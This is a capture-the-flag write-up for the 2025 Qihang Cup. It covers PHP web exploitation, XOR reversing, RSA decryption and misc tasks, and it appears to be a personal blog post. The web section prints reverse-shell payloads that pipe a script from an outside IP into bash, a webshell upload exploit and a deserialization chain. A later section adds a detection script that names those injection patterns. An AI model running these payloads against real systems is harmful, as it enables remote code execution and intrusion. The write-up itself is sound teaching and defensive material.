2025 Qihang Cup Writeup


Web

Easy-include

  • I did this one with a reverse shell; a direct cat gave no output at first, maybe a permissions issue?
  • Not sure why.


  • Get a shell directly

```
http://154.64.245.108:33142/?file=data://text/plain,<?=system("curl http://8.138.152.157/1.txt | bash");?>
```


Web_IP

  • PHP SSTI
  • payload

```
X-Forwarded-For:  {if system('curl http://8.138.152.157/1.txt | bash')}{/if}
```
  • POC

```http
GET /flag.php HTTP/1.1
Host: 8.219.82.75:32899
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
X-Forwarded-For: {if system('curl http://8.138.152.157/1.txt | bash')}{/if}
Referer: http://8.219.82.75:32899/hint.php
Priority: u=0, i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: GZCTF_Token=CfDJ8DRLK91Ea7BDvhbkEMqLA1qLH4Yg0rMm1mU6VkaBXyNvfb5Ixp8P7ZMeXIAVEuV1FMONm8oX9rdlahD4mny99zPTWjvIKwv282P8pzcMu8enKGPig3MMcEaS3z4uqq3Q34veSlBnEpi3Ds7x3wzJEsOQvKHb8ATV-E0G1r7r06ld8djHgYQDznSwJzRJy96agc-dBqSTXEHyVgEuLC74gEKurlh4oaX0lWQ5Fn9qQ5NY_t3EeJIdZfV2WXlo-QGdWFDssvfsY1F0fEKt-ew8WDea8PFh4cIfbEqkxiGezfzRRC3bQEmwGI9flHPZ2RKJRh6lEWwwMG9HLz5fxL7MWIsiHPo9TxYgWOniQWUuIPIueMirZ_tx9R_IQTM0Rz6-Kitq6JfAYoGfd4L5hjF2VfTQM3wGkuau3khWBlLTQc_K4X8FeF6ofBOe6eoPlJ5Eby4TiMgmtjqs9f0ZCysPSY8j-6FENv4nH_5mpwTOETZjovNjyzvTSVwTpNkkcR3yok_NMH1Nxo_1aR7PKdTScj3rGdIgyfBEZ8Y6A13gBVvMc3FdTFjtp1p0FGS5RKQZhH3UdivREFF9CGeZ_eQ2MuZZblhCUMyw5nQGU4kY_kGGu1qPQVucCxBnn7ETM0A5IEG1rIrxcQY7zvLqUMEUkHpzOn6y2BMK7m8DvscnP8MmteYlUkxcZfRMtc4PoLkHYHpyvdMfslgc3yMIFxWf92a1sKpTgB-Iuw6PSJejsLBZ
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
```


  • Note that you have to cat ../../../flag, traversing up to the root directory: there are two flags and one of them is fake.


PCREMagic

  • EXP

```python
import requests
from io import BytesIO

files = {
    'file': BytesIO(b'aaa<?php eval($_POST[xu7]);//' + b'a' * 1000000)
}
res = requests.post('http://challenge.qihangcup.cn:34096/index.php', files=files, allow_redirects=False)
print(res.headers)
```


```
http://challenge.qihangcup.cn:34096/data/794ad58c6b1d00f7f529264e05f31ead/5.php
```

  • Connect with AntSword


Web_pop

  • POC

```php
<?php

class Start {
    public $name;
    public $func;
}

class Sec {
    public $obj;
    public $var;
}

class Easy {
    public $cla;
}

class eeee {
    public $obj;
}

// build the deserialization chain
$a = new Start();
$b = new Sec();
$c = new Easy();
$d = new eeee();
$a1 = new Start();
$b1 = new Sec();

$a->name = $b;   // Start->name = Sec
$b->obj = $c;    // Sec->obj = Easy
$b->var = $d;    // Sec->var = eeee
$d->obj = $a1;   // eeee->obj = Start
$a1->func = $b1; // Start->func = Sec

// serialize
$serialized = serialize($a);
echo $serialized;
// O:5:"Start":2:{s:4:"name";O:3:"Sec":2:{s:3:"obj";O:4:"Easy":1:{s:3:"cla";N;}s:3:"var";O:4:"eeee":1:{s:3:"obj";O:5:"Start":2:{s:4:"name";N;s:4:"func";O:3:"Sec":2:{s:3:"obj";N;s:3:"var";N;}}}}s:4:"func";N;}
```
  • payload

```
POST
pop=O:5:"Start":2:{s:4:"name";O:3:"Sec":2:{s:3:"obj";O:4:"Easy":1:{s:3:"cla";N;}s:3:"var";O:4:"eeee":1:{s:3:"obj";O:5:"Start":2:{s:4:"name";N;s:4:"func";O:3:"Sec":2:{s:3:"obj";N;s:3:"var";N;}}}}s:4:"func";N;}
```
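The three web tasks above (Easy-include, Web_IP and Web_pop) all deliver their payload through a value the client controls: a `data://` stream wrapper in the `file` parameter, Smarty-style `{if}` tags in the X-Forwarded-For header, and a serialized PHP object in the `pop` POST field. The script below is an added example written for this writeup, not code from the original post or from the challenge authors. It shows how a request-scanning rule set (WAF rule or log-pipeline filter) would flag those three patterns and let a benign request through. The request records, the rule names and the `phpinfo()` stand-ins for the real payloads are all constructed here.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Client-controlled values that must never reach include()/require(): PHP stream
# wrappers (data:, php:, phar:, ...) turn a "file name" into attacker-supplied code.
WRAPPER_RE = re.compile(r"^\s*(data|php|phar|expect|glob|zip|compress\.\w+)\s*:", re.I)
# Smarty-style template tags; the Web_IP task shows them arriving in X-Forwarded-For.
TEMPLATE_RE = re.compile(r"\{\s*(if\b|/if\b|php\b|literal\b|\$\w)", re.I)
# A PHP serialized object literal: O:<len>:"<Class>":<count>:{ ... }
SERIALIZED_RE = re.compile(r'O:\d+:"[A-Za-z_\\][\w\\]*":\d+:\{')

RULES = (
    ("stream_wrapper", WRAPPER_RE),
    ("template_injection", TEMPLATE_RE),
    ("php_serialized_object", SERIALIZED_RE),
)

# Constructed sample requests (not from the original challenge traffic); each is the
# minimal set of fields a WAF or access-log pipeline would have at hand.
SAMPLE_REQUESTS = [
    {"method": "GET", "url": "/?file=data://text/plain,<?=phpinfo();?>",
     "headers": {}, "body": ""},
    {"method": "GET", "url": "/flag.php",
     "headers": {"X-Forwarded-For": "{if phpinfo()}{/if}"}, "body": ""},
    {"method": "POST", "url": "/", "headers": {},
     "body": 'pop=O:5:"Start":2:{s:4:"name";N;s:4:"func";N;}'},
    # percent-encoded wrapper: only caught because values are decoded before matching
    {"method": "GET", "url": "/?file=%64%61%74%61://text/plain,hello",
     "headers": {}, "body": ""},
    # benign: a plain file name and an ordinary proxy header
    {"method": "GET", "url": "/?file=about.html",
     "headers": {"X-Forwarded-For": "203.0.113.7"}, "body": ""},
]


def client_values(req):
    """Yield (location, value) for every client-controlled string in a request:
    decoded query parameters, header values and form-encoded body fields."""
    query = urlsplit(req["url"]).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        yield f"query:{name}", value
    for name, value in req.get("headers", {}).items():
        yield f"header:{name}", value
    body = req.get("body", "")
    if body:
        for name, value in parse_qsl(body, keep_blank_values=True):
            yield f"body:{name}", value


def scan_request(req):
    """Return a list of findings {rule, location, value} for one request."""
    findings = []
    for location, value in client_values(req):
        for rule, pattern in RULES:
            if pattern.search(value):
                findings.append({"rule": rule, "location": location, "value": value})
    return findings


def scan_requests(reqs):
    """Scan a batch of requests and flatten the findings, in request order."""
    return [f for req in reqs for f in scan_request(req)]


if __name__ == "__main__":
    for f in scan_requests(SAMPLE_REQUESTS):
        print(f"{f['rule']:22s} {f['location']:24s} {f['value'][:60]}")
```

The point of decoding query and body values before matching is visible in the fourth sample: `%64%61%74%61://` is the same `data://` wrapper to PHP, so a rule that only looks at the raw request line misses it. Headers are matched as received, since PHP does not percent-decode them.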


Reverse

checker

The main function is simple: it reads the input and then calls check.


The check function calls the encryption function and compares its output with the ciphertext. The ciphertext is already in the binary, so just dump it.


encrypted_flag


The encryption function `encrypt_flag` XORs each byte with 0x23.


Decryption script

```python
data = [
    0x72, 0x6B, 0x60, 0x77, 0x65, 0x58, 0x46, 0x46,
    0x15, 0x40, 0x14, 0x41, 0x1A, 0x40, 0x0E, 0x46,
    0x14, 0x45, 0x16, 0x0E, 0x17, 0x45, 0x42, 0x41,
    0x0E, 0x1A, 0x41, 0x47, 0x45, 0x0E, 0x46, 0x42,
    0x13, 0x14, 0x46, 0x13, 0x10, 0x17, 0x45, 0x15,
    0x42, 0x16, 0x5E
]

xor_value = 0x23
result_chars = ''.join(chr(byte ^ xor_value) for byte in data)
print("flag:", result_chars)

# flag: QHCTF{ee6c7b9c-e7f5-4fab-9bdf-ea07e034f6a5}
```

note

Check for a packer: it is UPX, and `upx -d` unpacks it directly.


Main function: dest is encrypted to produce the ciphertext s2, which is then checked against the entered password. Dump dest directly; note that it is 43 bytes here.


Encryption function: two XORs are applied here; v6 is little-endian, the four bytes 42 37 A1 7C.


Decryption script

```python
key = [0x42, 0x37, 0xA1, 0x7C]
dest = [0x12, 0x7D, 0xE1, 0x2C, 0x01, 0x4A, 0xC4, 0x45, 0x78, 0x5E, 0xC9, 0x46, 0x78, 0x5D, 0x83, 0x0F, 0x37, 0x12, 0xD0, 0x45, 0x63, 0x42, 0xD5, 0x57, 0x76, 0x14, 0xDE, 0x06, 0x6E, 0x04, 0x8F, 0x3E, 0x50, 0x21, 0xE1, 0x3B, 0x53, 0x72, 0xB7, 0x6C, 0x5D, 0x79, 0xF7]
a2 = []

for i in range(len(dest)):
    tmp = dest[i] ^ key[i % 4]   # first XOR: repeating 4-byte key
    tmp = tmp ^ (i + 1)          # second XOR: 1-based byte index
    a2.append(chr(tmp))

result = ''.join(a2)

print("flag: ", result)

# flag: QHCTF{b13cc67d-cd7b-4cc3-9df1-1b34cc4c186d}
```

rainbow

The attachment gives the encrypted ciphertext.


Go straight into the hide_flag() function.


The encryption is just XOR with 0x5A.


Decryption script

```python
hex_string = "0B12190E1C213B6268686C6B6A69776F3B633B776E3C3B6D773B38393C773E3F3B6E69623B6D393F6D6227"
byte_array = bytes.fromhex(hex_string)
xor_key = 0x5A
result = bytearray()

for byte in byte_array:
    result.append(byte ^ xor_key)

result_hex = result.hex()
result_string = result.decode(errors='ignore')
print("flag:", result_string)

# flag: QHCTF{a8226103-5a9a-4fa7-abcf-dea438a7ce78}
```
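All three reverse tasks (checker, note, rainbow) hide the flag behind a byte-wise XOR: a single constant key (0x23, 0x5A) or, for note, a 4-byte repeating key combined with the 1-based byte index. Because the flag format QHCTF{...} is fixed, the key can be recovered from the ciphertext alone, without reading it out of the disassembly: XOR the first keylen ciphertext bytes with the known prefix. The script below is an added example, not part of the original writeup. The model `ct[i] = pt[i] ^ key[i % keylen] ^ mix(i)` and the `mix` parameter are a generalisation of the three scripts above made here for the example; the ciphertexts are the ones quoted in those scripts, and the printable-ASCII check rejects a wrong guess of key length or mix.

```python
# Known-plaintext recovery of repeating XOR keys (assumed model, see lead-in):
#   ct[i] = pt[i] ^ key[i % keylen] ^ mix(i)
# checker and rainbow: keylen 1, no index mixing; note: keylen 4, mix(i) = i + 1.

# Ciphertexts copied from the three decryption scripts above (43 bytes each).
CHECKER_CT = bytes.fromhex(
    "726B607765584646 154014411A400E46 1445160E17454241"
    "0E1A4147450E4642 1314461310174515 42165E")
NOTE_CT = bytes.fromhex(
    "127DE12C014AC445 785EC946785D830F 3712D0456342D557"
    "7614DE066E048F3E 5021E13B5372B76C 5D79F7")
RAINBOW_CT = bytes.fromhex(
    "0B12190E1C213B6268686C6B6A69776F3B633B776E3C3B6D773B38393C773E3F"
    "3B6E69623B6D393F6D6227")

KNOWN_PREFIX = b"QHCTF{"   # fixed flag format for this CTF


def no_mix(i):
    """Default index mixing: none."""
    return 0


def recover_key(ct, known, keylen, mix=no_mix):
    """Derive the repeating key from the first keylen bytes of known plaintext.
    Needs at least keylen known bytes; each key byte is ct ^ pt ^ mix at that index."""
    if len(known) < keylen:
        raise ValueError(f"need at least {keylen} known bytes, have {len(known)}")
    return bytes(ct[i] ^ known[i] ^ mix(i) for i in range(keylen))


def xor_decrypt(ct, key, mix=no_mix):
    """Apply the modelled transform (it is its own inverse)."""
    return bytes(c ^ key[i % len(key)] ^ mix(i) for i, c in enumerate(ct))


def recover_flag(ct, keylen, mix=no_mix, known=KNOWN_PREFIX):
    """Return (key, flag). Raises ValueError when the recovered key does not
    reproduce the known prefix or yields non-printable bytes, i.e. when the
    guessed keylen/mix does not match how the binary actually encrypts."""
    key = recover_key(ct, known, keylen, mix)
    pt = xor_decrypt(ct, key, mix)
    if not pt.startswith(known) or not all(0x20 <= b < 0x7F for b in pt):
        raise ValueError("wrong keylen or mix: plaintext is not printable ASCII")
    return key, pt.decode("ascii")


if __name__ == "__main__":
    for name, ct, keylen, mix in (
        ("checker", CHECKER_CT, 1, no_mix),
        ("note", NOTE_CT, 4, lambda i: i + 1),
        ("rainbow", RAINBOW_CT, 1, no_mix),
    ):
        key, flag = recover_flag(ct, keylen, mix)
        print(f"{name:8s} key={key.hex()} flag={flag}")
```

Guessing a single-byte key for note (`recover_flag(NOTE_CT, 1)`) fails the prefix check and raises, which is the behaviour you want from a solver script: a wrong model should be reported, not silently produce garbage that looks like a flag.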

Crypto

Easy_RSA

Simple RSA: two private keys and two OAEP-encrypted messages are given; decrypt each with its own key.

```python
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 25 15:15:00 2025

@author: yinao
"""
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import base64

# first private key and encrypted message
private_key_1 = b'-----BEGIN RSA PRIVATE KEY-----\nMIICWwIBAAKBgQDH1WQoDn3PRd6RBFz0cX3w2qJNmkulEB16QRYhVYI4fKD3wIWE\nXNb3nAvvQ+EAfrhMHKjVE/9jEK68QnIPvKhBPGni1AJ0/2QeNlA3ab1ATy337ZCw\n9AaW5fwnhw5ZNteC1QUdus1iuRDZomdegyTbFnrzvnr0veu5qvlh7WwBeQIDAQAB\nAoGABEuOQKyoEFqReTc5asEeOn0uiCG4/sIhChHIUJzahM2L9atIC2Nl9PJAEOtZ\n9JVkr3EdwV+xyW6wPMhmVHeC+8Mypn3K+aWct8C1GGo7qnP/XfAzoiFt+6CU58FK\nfVcnzFPF2g9vT/d66ugoS3X+SU+GYQ5t2R8sh+JLZgVLv4ECQQDLx1XPFQUzniy7\naNK7QOer38ZSWZG7YPNyr/N6DIfU65Lj7RJOWnew5kxVFLCoWYqhbULkj3/RkcSt\n1cSordaBAkEA+ws+If0lLUb6js8b7Ui4v1NijKP9kNCEqCeXFbVxCQbcO6olfw4A\n5px5+pKyhwlSiTy+/lR95Hx6AcpNHBNe+QJAM20Dt7XrUSJ60XTbsYvoq1RWvVOD\nVpFZ/rhurn9ZDB/DOygJ9aIZEJid7N7C0kl+lcx4FCwuqpmp0+Ddt1/fgQJAbnsy\nKu8nb1evaS4IklLQy5K86jw5mYPK/d3+hdVGG7zjK3bj7ZiSGOuAWyA4ZWla437S\nZ0dz6BxH7YXEjbiQsQJAVCYj4bzNKjkdNHpbXEN3Ll12S3JnyElBSdMLpafi4tf0\nGbpgoePtKjQFb6pU4NXxMMgvxNT5q2BI7F9PUStH4A==\n-----END RSA PRIVATE KEY-----'
enmessage_1 = "YVhEwohz+9XA8bGkIxoSQTJRKURYbVGZJSeG66Pf4G6a0Vvza6Z/gnlKzsXHdTg77LvrqG9FcZa68+HCPib4D75p4wgNcj01ChFKCgeApitUDxkNw7cDF934A9KZ0PnyRTWsS+0skphY3wsyQaxNgpUXY7WX0A88AVmcHrCa/6A="

# second private key and encrypted message
private_key_2 = b'-----BEGIN RSA PRIVATE KEY-----\nMIICXAIBAAKBgQC7g4FElx5lh4CcdzdUyI+SObMgaQr3w/ahv7+FpI+5ssrAQp2S\nf0Mb5iCtkT2SqLFGHlE2mjycS7Thmldw7f9T+i1zkpfPfAsFnc9ubWGBhQ6+aDZt\nnbvla10nXxrby9gkkJcg2Qjk6D7Wjc76shsH9yNhfAxmYY/2S64CD1uNfQIDAQAB\nAoGACmf444qTaEUF0SkYi/75YL8M/s51ilx4sm9GvK7uPvr6H4NS5U9ktQanZ5p4\n1UvBUsfZ7/LNTEszRZXgJmc+1RzKCeM+xBm+Q6WFLsIkJtkVoscb45CCXrlSSOwi\npF/tfnmWZGVRKm5gzXKAlWZnZReRxKpc3mTboP0sqMOoCE0CQQDFw6YAkMO1S+2B\ntBLTJvLp9xcKCPr+hLdophSpLQExGRQvSHjq6SwmkaoHegngoFOXmeNb99yEZ1J/\nh5vY5Sp7AkEA8rsfn1rsfQZelUGPCHZRJAhjrELMVpR/VIFHnNTUlNfP5jVjUpkW\neYM8MyGijE17FIN+QcIhtZlpY7gtLS+CZwJARbZoB/7/3iK7wGL319L9AhiF2JW9\n1IZ4GL2ivtgMeYA7q0dCyJwVYisq4qPUY4hgryoiCUNgSpQZcrcc6uItjQJARZuX\n4/EFJI1xDkhwpjKX7kdhngLB6opHQYqZaMY3+D8zZYcl5of0RAB4gQlCPg3yH93d\nlSoA1L0b1fb5LZ4UPQJBAIloV3ZmziPQVG7/P6Jq5wJiumHtg4ZFr6Ja6xufocw2\nvBzCI9nAJp9rLcnzgMSSV1hpCWW3pieZxaWyH8JCRhM=\n-----END RSA PRIVATE KEY-----'
enmessage_2 = "mqEPcZJsctA2nj+U9o6uWyu1P9qxO2psdkzlygzbZBgXGfFCt2xuz/ZY1UT1DXODcMacc4lFMi7xiOMR5Ih6gOTYhKOcskco4ViYtwrdjSlKhnj8bTVYUqFXEKghP0kUYGk9CjoHDZ0XqSn6M3UiXAZ8sgCgIGN+6XcegryDyPQ="

def decrypt_message(encrypted_message, private_key):
    # Base64-decode the ciphertext
    encrypted_data = base64.b64decode(encrypted_message)

    # import the private key
    key = RSA.import_key(private_key)

    # decrypt with PKCS1_OAEP
    cipher = PKCS1_OAEP.new(key)
    decrypted_message = cipher.decrypt(encrypted_data)

    return decrypted_message.decode()

# decrypt the first message
decrypted_1 = decrypt_message(enmessage_1, private_key_1)
print("解密后的消息 1:")
print(decrypted_1)

# decrypt the second message
decrypted_2 = decrypt_message(enmessage_2, private_key_2)
print("解密后的消息 2:")
print(decrypted_2)
```

This gives the flag: QHCTF{094d1e0f-c080-416d-8609-9caef14eb39a}

Misc

Find the location where the photo was taken


QHCTF for Year 2025

QHCTF{FUN}


pvzhe


羊文



2025 Qihang Cup Writeup
https://xu17.top/2025/01/26/2025启航杯wp/
Author: XU17
Published: January 26, 2025
License: XU17